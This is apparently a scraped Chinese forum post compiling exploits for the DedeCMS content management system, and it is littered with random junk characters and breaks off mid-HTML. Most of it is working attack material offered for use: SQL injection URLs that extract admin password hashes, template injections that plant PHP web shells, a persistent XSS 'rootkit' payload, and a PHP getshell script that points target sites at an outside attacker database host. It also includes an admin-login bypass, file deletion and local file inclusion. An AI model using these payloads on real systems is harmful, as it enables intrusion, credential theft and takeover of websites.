|
|
6 s/ O) W& t( A1 ^9 y: `
Dedecms 5.6 rss注入漏洞0 \/ {; r+ Y# J$ S
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
O/ U' _. K2 k+ v0 x6 f$ u
3 [8 n- d9 f/ ]; O4 C( Y) j9 T' f9 X- q
; t) ~7 K3 d4 G4 U9 f9 n! G3 u, [9 |4 X' g1 E) A
1 h1 L1 v( d4 T
' U0 ~/ N( S9 i; a( `
" A/ d4 P( l$ Y7 f& W' I+ O8 W: B6 W% `/ r/ B4 g0 E
DedeCms v5.6 嵌入恶意代码执行漏洞
: @5 O8 b# T" ]( z注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}1 Y9 R: J1 H+ T. u1 m( f* ~
发表后查看或修改即可执行
b2 l5 Q. U; W5 ~6 n. n( c6 e0 Ba{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
/ e, w" f: s0 C$ a% Y9 m生成x.php 密码xiao,直接生成一句话。
' ` u) O$ g9 m( Z# S7 n: Y, x( U& n! L( S: [
3 H5 ^& ]. N v: g6 i2 X8 }$ g
1 z7 T2 u) e8 d% n" l
) O4 }6 x1 G* B7 x
/ s) S% h& O3 _" o7 k: c5 k7 g" O+ n4 U' H+ ~
+ u3 M f# a) g" _+ X: B& C
7 _1 j Y/ `6 ~8 P9 { w$ e
Dede 5.6 GBK SQL注入漏洞2 T' m0 J4 R( K @3 E; `
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';8 y* L. a3 ?; x
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe. \7 A: F* L% G# Q9 E; q
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7- c" k& v% L- \ p: n
+ `9 N$ {" A* m7 Q' u* N) }
1 h$ F% V/ {. E' {9 g3 K, m: S
0 F& F7 t0 n& s6 i( D& [; c' S+ s' w0 Z& l0 ^/ y# E1 z/ [
# ?2 o1 C( X( K1 `+ }. p' z9 E, d, |1 w3 b# s, r5 V
3 N, L" P! ]. R' h
* |6 v& s2 g$ p+ D. w
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞0 k- G. O I6 X! H
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
# A& P- L) u) F" r( t% L5 {8 H& n' U
: h1 q7 W. M/ Q. Y
' q* ~. Y9 b( @( B1 D6 \7 S, m
' m$ m1 q& ~/ e9 t ^: [
5 `3 q# h, S( j
, t. ]9 w: e6 p/ v
% V5 G) d7 f; N1 `: ?( CDEDECMS 全版本 gotopage变量XSS漏洞
) m2 i0 f* f, s1 X3 |1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 $ j# L# [# U; l, d
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
( G. Q" v& x' e, `! z2 n" X: h" q& g
% a! E/ v: @& i: t2 ~7 H& G; M
1 F* ^" B3 @0 M+ F, Y2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 6 v9 ~1 D C( j) A, X
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda6 J' P6 q: Q" F* c1 O" k
7 o& B, l% j/ d1 C* R" Z$ i
$ v- x( p* b a1 c0 D1 V6 Nhttp://v57.demo.dedecms.com/dede/login.php6 w; M. T- s! p& ~! |/ `
$ |; x `) i: p
, \2 r$ s. \, l8 S0 n5 fcolor=Red]DeDeCMS(织梦)变量覆盖getshell
9 w8 X4 r4 P* Z8 [/ e#!usr/bin/php -w
& r/ E' d% R3 ~ \- s& H% l<?php
% u- m9 u6 F/ F5 K @error_reporting(E_ERROR);
+ ~' V# m- s) T0 p' L& lset_time_limit(0);8 K$ ^3 E( @5 }* f# Y( H
print_r('
$ D5 h" x$ B' C$ q+ _, aDEDEcms Variable Coverage
4 {; d/ R8 u$ j5 Q/ g- x6 T5 rExploit Author: www.heixiaozi.comwww.webvul.com
3 l6 i8 J6 @) ~; {);! _, d8 \) @# r; A# w
echo "\r\n";
* m0 T$ X% @5 W9 R3 D8 T- k! cif($argv[2]==null){7 C C4 p" S1 m
print_r('* w3 N. N d0 S* R* Q' G" u
+---------------------------------------------------------------------------+. J( m9 `( |' L2 G3 x) z
Usage: php '.$argv[0].' url aid path( [. y# r4 E; _4 _6 O E
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
' C4 N8 w) K; b) e% g+ VExample:" X) a' e$ X( F
php '.$argv[0].' www.site.com 1 old& [1 \" L) M$ s# K/ S; j- l4 ]
+---------------------------------------------------------------------------+
6 ]5 f, m2 P+ K: m');
3 d+ Z4 w- E3 Z8 n" f+ A% Oexit;
. U( k6 V/ \0 S: b$ B9 i5 q9 X}0 ]# D3 M1 V8 d0 O6 r# ]$ H Q
$url=$argv[1];4 p: ^# T J0 d
$aid=$argv[2];
* L3 G/ [( `5 S! e7 ~0 N, N$path=$argv[3];
' ]1 {4 D* H8 i! e _/ I/ M$exp=Getshell($url,$aid,$path);
@ S9 T3 h- D% E5 Cif (strpos($exp,"OK")>12){! x! `& y K4 C' ~: l' F
echo "
9 ]' s6 N4 Y7 tExploit Success \n";
6 D& q! s) ]* _1 }if($aid==1)echo "6 b% W# ~- X& a$ c/ l
Shell:".$url."/$path/data/cache/fuck.php\n" ;! A( Q+ _9 V: \, b5 v/ G# Z: m& @
, O$ Z( a% M1 ^! j: f. J- K! ~( O8 y2 R) P0 I
if($aid==2)echo "
% C3 \. Y s+ ]1 o; [3 U6 @Shell:".$url."/$path/fuck.php\n" ;/ s1 h6 Z& z6 a, W
' ^1 v. P1 p6 d U/ i
) `( f: l' n5 x- [if($aid==3)echo "
9 ?& x( _/ W1 ]# p' {9 tShell:".$url."/$path/plus/fuck.php\n";
3 E: r( t: G$ @5 \) A) W B! m
j/ V8 |8 X/ {2 H& `% A2 C
. i/ X' ?+ a% C2 J}else{! c/ a/ j, J9 r3 [' u
echo "
6 Q) o/ B) X0 W' m5 E1 `Exploit Failed \n"; i/ x" V% ~ C7 w" x
}& g, {/ j3 h5 f. u7 G" C
function Getshell($url,$aid,$path){* c! F, {, y) g2 R
$id=$aid;
8 ~' V" X' e; d7 s h7 ?$host=$url;
- m1 q6 x; K9 {8 N. d$port="80";5 x9 H2 m( ~7 `/ \
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
# j, u. g6 J) {7 E+ V$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";5 I# w3 H8 @0 g+ }# l) O: f( t, c
$data .= "Host: ".$host."\r\n";
+ {) W# h6 f2 w) y$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$ s: j$ i$ X/ g7 Q! K! a/ y$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";5 Q# R3 x- m; k2 C
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
- m+ h1 k6 K3 k//$data .= "Accept-Encoding: gzip,deflate\r\n";
- H& u' [2 h! F& m- I$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
& S! i) u. }2 [1 V1 |! S* G$data .= "Connection: keep-alive\r\n";
9 R( x0 q. Z; U; X; _$data .= "Content-Type: application/x-www-form-urlencoded\r\n";) q( {* q. U4 X7 k* x) Z
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
7 _% s2 b" g. Z( l( p w$data .= $content."\r\n";: c+ t8 u. E! ]. w( e' o# a
$ock=fsockopen($host,$port);
$ @6 v3 I+ E! H1 J; pif (!$ock) {' B2 N# L( e2 Z: u! p' [
echo "9 x! r9 ~5 C2 J+ v$ z+ w
No response from ".$host."\n";. G3 X3 q, R! s9 }- u& _
}
4 `; }- m2 d) E+ K& n% C2 ?5 Rfwrite($ock,$data);
( x" I8 i8 O9 z4 c2 K$ `5 ewhile (!feof($ock)) {( \- o% J+ g; a
$exp=fgets($ock, 1024);' u8 p( K( y/ f0 M
return $exp;9 d. W$ I( X; Q) L, Z* b# M2 a4 z6 d
}
. n2 x- b9 G4 D8 P; |, g; d}" n- K( M5 h( F/ q
! L. I, {& y4 L$ ]9 V
% e6 E; W# \* @# k ~: t?>
, d* \+ W3 x0 {# N" l3 D' q# q* D" u! C, `5 }! f7 k/ @- |( G1 v) m
" e% J* I4 F$ ?
( M U0 a; o% a* a; A+ P! E. I% K
" M2 J7 ?* Y$ c/ i
3 i. N. F# u% o) q) C5 I
- c" `$ q5 N" O) L) J' E" O- i5 z, s7 A0 M/ @, N
+ ?/ x1 [" g. v! ~! X0 q; u+ P" i
1 p9 I6 ?! L; J, b
! Z5 B3 Z0 T9 P
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
3 \/ t0 S ?/ Z8 h/ P/ H! bhttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root8 a: y! F$ N( V ]
. _$ A' i. {' f) Q1 u
* y7 M& k. p" l# M1 f7 R G
把上面validate=dcug改为当前的验证码,即可直接进入网站后台4 |$ d1 [5 B. J. i
9 P9 p2 ~5 j: C! u+ J
) T! x7 p) T. v; e3 ~5 l
此漏洞的前提是必须得到后台路径才能实现) z! I9 H, ^$ [7 {3 F
- c8 G7 B! x# j/ Y% l: p
* Y. z6 W: k( q3 P* I1 ^9 d% }9 f1 r8 H$ w l
7 g$ w2 B( @6 C/ ^1 n k. ?' e n
' _ B5 P; m3 h1 f: c8 I
9 ?# o# I7 {- r7 c
5 T' F7 Y3 f% ]5 r9 k& Y
! {) C3 m8 n) D7 y3 }8 W3 k1 d' M( }; R
' `" H% S3 i8 L; E$ D% B& ?- L, A& n6 ]. Y6 E8 D1 z
Dedecms织梦 标签远程文件写入漏洞
/ y5 \; Z" p; X! X前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');! D, |9 T3 }1 C9 L; g3 f; ~
, G" R* W9 D$ H/ ~
' p t( A$ ]( }$ g再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
2 U5 C, l6 a# ]; [7 ]<form action="" method="post" name="QuickSearch" id="QuickSearch">
$ g( u: y. X- q( A% r6 C<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
( e! W3 w: C G) J- O<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
; R* l$ u3 ~( `6 S9 i. L1 n2 r& I; K<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />; I: x* N. b6 K2 S
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />& }7 g- ]! @, A; {) |
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />! M* w& ^2 j6 V- x, W
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />( l3 y) ]' R& F3 Z6 q l( _& [
<input type="text" value="true" name="nocache" style="width:400">
% H4 _. S+ |; v0 Y$ W<input type="submit" value="提交" name="QuickSearchBtn"><br />
2 }& M; b' o. ?. ^! [$ h' m+ k</form>' n4 S7 L. ]: l
<script>1 v( V6 F b) ~
function addaction()
) ~0 U$ \5 J4 s+ k0 `5 f{
* s, G# B- i" L/ u6 ^document.QuickSearch.action=document.QuickSearch.doaction.value;
' h; p$ S9 F4 c7 Q}4 Q9 H* v K: K" R! @
</script>- X% r% U$ N* C
6 F- m2 r. n# C+ `& X' w- r" A/ D9 @+ }' I! q. O3 J# w' \
5 `: ?: z* Y0 J: T
1 O+ x; c' _) p6 v6 c8 ?
$ W K7 n( {; L) V( z' R( {/ l
+ `$ O3 _& @- m6 h0 u! c
. e& [3 \( E* d2 s6 c9 ]+ w q6 J/ W( V2 m
+ j4 I0 b( p3 C( t' G
7 T: y1 g; j* K: H+ n- G. t1 A; |8 I+ [" c9 }* c* Q$ t
DedeCms v5.6 嵌入恶意代码执行漏洞
: {, k A' a6 b8 e注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行! ~) A% x$ m& A2 F; y$ e
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}7 |! F) ?7 }* o. d
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
" j9 R! D$ I0 l& W* F" kDedecms <= V5.6 Final模板执行漏洞0 K& P; K \2 z6 E# x
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:+ g7 G: D9 G/ l; A
uploads/userup/2/12OMX04-15A.jpg( g6 y3 T, e9 ~ _, x, J
$ o* ?) k: \! t: O4 T% P2 S
6 g' r/ y6 x) n
模板内容是(如果限制图片格式,加gif89a):1 I" [8 G8 [+ B' r* D" \6 c% n
{dede:name runphp='yes'}- d) E5 U) m2 {# l
$fp = @fopen("1.php", 'a');
% l* ` @* h+ g5 v$ X- U9 t@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
# B' {& r7 x8 m% s# h" T& K5 N- I+ C@fclose($fp);- ?7 M9 E6 T' `# Y$ L) t
{/dede:name}
7 \2 I }# t- G2 z! s; }# M2 修改刚刚发表的文章,查看源文件,构造一个表单:' t2 X- Z: w7 E+ i8 b
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">8 v+ A- E) Y/ Y2 d* O5 n( r3 m6 z
<input type="hidden" name="dopost" value="save" />
5 u0 s2 @* h5 @+ A<input type="hidden" name="aid" value="2" />9 }2 |' f' ]# {% b/ O
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />' z- n J) g: n; f3 }, ?
<input type="hidden" name="channelid" value="1" />& l; M% h) a5 L' ~
<input type="hidden" name="oldlitpic" value="" />
+ s7 x( ?0 e# W2 [) K# V<input type="hidden" name="sortrank" value="1275972263" />! g% U- B& Y9 R; L
+ Q$ n2 G& ^. A) G( T, \" z
8 N) Z* k" x" T5 D& N3 b4 R, G$ ?& e
<div id="mainCp">
( c7 b% H4 k% h- R<h3 class="meTitle"><strong>修改文章</strong></h3>
0 Q( n# z' R- v7 o6 L, B) b6 H( N2 l$ A4 g
% K! ^: @3 K, N1 { Z# w1 z<div class="postForm">2 U2 N1 {2 H3 d
<label>标题:</label>
* I [$ ?1 V# _5 Y9 B& H<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/> R. m3 n4 Z# a, b% F: ]) ]* z; ]
4 l. {& x) Z; s, ]: t1 i2 c! A7 B9 \8 i
<label>标签TAG:</label>
# h/ X% M4 `& ?; O- c* D8 D& x5 s<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
: F& g" q; B. F) ^
f3 z/ _, q+ s3 B3 Y7 N/ v
( E1 z$ ?6 s& X% y( x& G3 Q<label>作者:</label>$ a4 ~1 r8 @9 W
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>! ~, \' s( }$ {
9 `+ P& Q5 H K, V2 i6 @/ U, S5 ?, ?* ^) c% o8 `% K
<label>隶属栏目:</label>
4 l' d$ A |' C( s- ?<select name='typeid' size='1'>) n/ Q* X [" ~& g5 w1 g
<option value='1' class='option3' selected=''>测试栏目</option>, ?' U# v+ A3 d
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
9 H' `- s7 ]5 h6 m! K, @( R) F7 w" i; T
3 k7 J" E7 c [, l# N- u3 T+ ]
<label>我的分类:</label>
! ~# ?+ `+ W& U! T<select name='mtypesid' size='1'>" k$ _- M: H) ?
<option value='0' selected>请选择分类...</option>; z5 V4 i* W" m& Q9 W
<option value='1' class='option3' selected>hahahha</option>5 b+ ]0 p7 Q/ a1 l
</select>
8 \1 L5 l/ _$ A% x, u. z4 ^: n; \3 o
# t/ J& ^* X* \3 J<label>信息摘要:</label>
4 |, m" O# y! r* ^7 x- O% e3 ~7 ]<textarea name="description" id="description">1111111</textarea>2 I9 y6 R) s8 ^1 b. x7 E& n9 H$ K
(内容的简要说明)
, N8 [9 ?5 ?9 h) Z1 E1 m
9 Y4 I6 o" g5 q. [& Q8 T/ s
4 a( a/ _( x( V# q5 t$ Z1 T& B; Q<label>缩略图:</label>
, t7 O1 m ^# G<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
\6 Q8 j3 E) `9 t) L
2 T5 ?5 C* I+ {$ Y7 S9 m5 }+ A
" I! u; d) v V' m+ F# ~0 \<input type='text' name='templet'5 r- w/ X, K) ~: K8 G
value="../ uploads/userup/2/12OMX04-15A.jpg">
6 V3 ^+ |+ _* |8 [& ?* L<input type='text' name='dede_addonfields'
. j1 B- M' X/ A/ n' Y8 \value="templet,htmltext;">(这里构造)
5 R9 ~* p) n6 s</div>8 U, _$ S9 [& j) Z
$ h7 Y! L7 `' Z0 ~4 Q& b' Z0 t
( b/ f+ {. c0 |( ~( e<!-- 表单操作区域 -->+ ~8 j. l5 }8 B' v0 u
<h3 class="meTitle">详细内容</h3>8 k2 m; v4 {) p- X: w
. j6 @1 v r4 ?: ]3 g. L$ J% g# S6 j# G: C! w8 g
<div class="contentShow postForm">8 r" L, j: c1 X4 j! o+ ^
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
5 ~% o7 ?2 j0 G# i% b. a2 ^: ?3 o4 N" n9 N
' p% Z" p0 [6 l7 B f ~<label>验证码:</label>; P, [8 a: u3 H% i/ K4 {
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
8 M* l3 j/ u: k" l, c: J4 s4 P/ h<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
& W9 H( T/ S5 g7 x7 k, r/ r7 z4 M" @+ Z: e
$ y) c1 q A8 `<button class="button2" type="submit">提交</button>( I1 z+ P; S) q; `" T& w
<button class="button2 ml10" type="reset">重置</button>
) t8 T8 ^& k% P8 A</div>
, s6 r6 P( r9 h0 P: u# n8 Y+ o# H: K+ G8 W. I2 Q
, N" R# J+ k& f( g- R
</div>
) M% O' O+ Q [4 f! q
- D2 d# W' _4 A4 F2 m" B5 V6 B+ S7 ]% x# J2 _
</form>9 _) ]7 ~' r; k$ a( t
5 V6 J/ ]0 f) x$ o: k! l
3 U% F8 h T% {- z# o! G9 ^提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
# o* }/ k# i1 F3 y0 q假设刚刚修改的文章的aid为2,则我们只需要访问:
0 s. j5 s* t. Z& c' }3 Qhttp://127.0.0.1/dede/plus/view.php?aid=2
/ k% C* X" m- J- p, d/ X: e即可以在plus目录下生成webshell:1.php
8 G( N( d* M& z( ?5 y& c1 Y. m t) v7 W9 K. T9 t! z
5 k3 q+ C& e+ I' N
/ Q H* `* c0 x4 M( t- F! x% S
! U4 r- [% R4 P- u* Y0 C' ~* N3 ]. T
6 F" U+ O1 ^6 {; \
5 X/ r/ j w/ x" t( t7 L1 \
- q9 f4 U, f+ ^2 ]+ X
' m& N7 g- q, e9 c& A9 Z1 v. X* g5 Y& f! W7 c) ^
6 Q* j; t1 x: u9 {* Q6 @) r
& c# M8 i, \7 o+ [# u
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
6 E9 ?2 I2 E/ R* q# C: \Gif89a{dede:field name='toby57' runphp='yes'}
' J7 S/ E% d2 j3 H# A) M0 Fphpinfo();! {: G1 m7 z/ C( v; j7 M5 o+ e
{/dede:field}5 a" ~# S; s6 O/ f2 W
保存为1.gif7 s5 g6 U! G F& M. g" m
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> $ O% M. J! `+ h5 ]7 ?' L/ u
<input type="hidden" name="aid" value="7" /> , \1 m& z" A9 J+ m8 o5 F
<input type="hidden" name="mediatype" value="1" />
( e8 S( u" W0 U<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> * y) m4 D$ }+ K- B" M. q
<input type="hidden" name="dopost" value="save" />
5 R" D' V4 m9 f0 A* n<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> * b0 A; H7 i5 R1 H
<input name="addonfile" type="file" id="addonfile"/> 9 r. @' Q, }; _2 f# ^- i0 d0 Q
<button class="button2" type="submit" >更改</button> 8 q/ L6 R3 q' D$ T- o: ?
</form> 2 |) Q( t. ~: l2 j2 ?
& _. A, s6 N: J
+ Z5 v! ^5 K+ A6 I! C
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
v* O2 i6 y% {2 H+ K发表文章,然后构造修改表单如下:
( Q! s% n0 m4 X9 O! q) t& D0 _) H! z# a7 A: I
2 r# } `& |% x$ Z1 k. X3 k1 E* L
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
0 p4 y* }4 k7 r" y" B<input type="hidden" name="dopost" value="save" />
9 G/ V2 p6 `( M<input type="hidden" name="aid" value="2" /> # V! `( T) r3 L5 h# N
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
& U5 w) o9 S2 |' {: M+ D<input type="hidden" name="channelid" value="1" /> ! K3 ~5 d* s9 b8 T. h1 K) X
<input type="hidden" name="oldlitpic" value="" />
3 @: V( s; p4 N' { u9 a" Y; O<input type="hidden" name="sortrank" value="1282049150" /> * n8 a. O6 R" D0 b
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> " n: i i2 R; j' A& R
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
/ m) D9 P" u/ B/ s: d8 N( ?<select name='typeid' size='1'>
" [, V* T W/ Y/ T0 A# d<option value='1' class='option3' selected=''>Test</option>
2 i; N7 s' l3 z5 [+ O<select name='mtypesid' size='1'>
8 w, N4 ?9 m3 E: v s<option value='0' selected>请选择分类...</option>
0 W+ D. R7 D. C7 H, J<option value='1' class='option3' selected>aa</option></select> 6 ]; q" x ^+ g( |5 e) q) G
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> # y1 A4 h& F5 e0 N7 E* b
<input type='hidden' name='dede_addonfields' value="templet">
6 k, i* D: u) t3 W! r: M- _<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
& r: ?7 X, \4 b' p6 u q<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> $ b1 e% V: c4 H% a7 c8 K
<button class="button2" type="submit">提交</button> ! j5 B( K( b; F3 B2 c3 I
</form>
/ R* W" p7 F+ F8 l A+ _& a8 `! Y! T2 v/ K" w
6 u8 x: a+ G; c) z+ K; x
$ v$ R( H) E- y
9 v: `$ p$ j( [9 X) F7 O7 B' D2 W: f4 E7 m8 v' @. T8 F
# q* |3 b9 e! J; @
! `7 e/ E9 G. c; _3 @; P/ p
# C3 r9 b w6 A& n% k
* |1 ~9 @: h3 y, I) ^$ T* C1 \! {& X3 X& [
7 ~9 S$ G6 T6 c1 z
: j8 J( Q, y, {) b& T4 D4 s5 h织梦(Dedecms)V5.6 远程文件删除漏洞 x3 K; Z1 _7 T7 c. Z1 X( [4 `
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif0 ~! V7 L+ r6 a! l( P- n" @
1 f W" t& k% \- j8 h3 B- J
2 ^( i- z" m9 ^5 R) c
% t* M# V2 p+ V& h( Y" J' A
; z6 a/ m; i- @7 M( a3 W$ v" c- g2 Q# R% R
$ b$ d/ ^4 l6 U. }
8 P0 R& k1 @; x6 \5 ~
' ^0 ?' B* D/ p& o8 k7 o( D1 N) B, n3 W4 r/ M. p1 d* H
7 I" V5 g: u. \7 Z织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
9 l1 i3 n3 ]. P( thttp://www.test.com/plus/carbuya ... urn&code=../../. u: U% O* {6 G7 k* w
; ~3 u9 ^8 \0 V1 q3 I! q/ z
$ z( l% J2 Q9 h1 \
. {& f1 m8 J" ^1 ?
4 L) g! f5 ~3 H: q
( J2 g# H6 l# D) T; x' ]
" v! T w7 B, B
6 K5 T' b' e7 \# `
9 c [6 F2 E: u
3 y& H! r/ o) Z6 M0 G9 a6 B2 m4 {' f- V- [" p" A. H: Z3 C# g
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 : f# T- e$ g$ k8 N, t" e
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
3 r6 E7 L& G7 O% w7 V密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
5 u, M5 o6 w X# v6 q) j$ S& L. Z% m0 @) `: {
( T9 p6 k+ d9 R" F v8 j% z9 t7 [* @- f9 y" f. K! R
. o" L2 X6 s2 \: J* \0 J0 ]9 Z) C7 w3 v- g) R$ W W( \4 B& W
* L$ r( {) G J0 |
1 J9 q& D0 x1 g3 D. y1 E% |8 _/ l) |! o( B _
; p+ i4 a$ P4 R6 D7 x) T" ^" t
4 p6 o, P* j% K, v# v0 V
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞/ Z; N9 ?( H' m U' Y4 c
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
0 d7 F; K* J$ W& T) a" }$ b
* o4 O# U* x% S. Y8 e- P) ]8 I, {& n# J- N2 u& J: V5 \7 T" Q& U
* U* f9 | K0 }. g$ r( G* D4 H/ q+ ?- E- H4 L
6 e7 f! h \9 p( g$ \# B
" P$ Z3 ^7 d3 F# x% k# B0 `' A9 s3 U- m8 l }: _- P; Y
( p/ w- z' u. W# I% H1 y- K3 m/ `: s) N8 \
! k7 J0 o ]+ ]0 y+ T
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
+ j$ Y: V/ T% `+ B7 w<html>. R2 k m7 A. y1 ^
<head>4 u! b2 ]- W0 @9 H7 `
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
' ^$ u3 x* c% g" J: `5 T% ]3 v3 }; `</head>
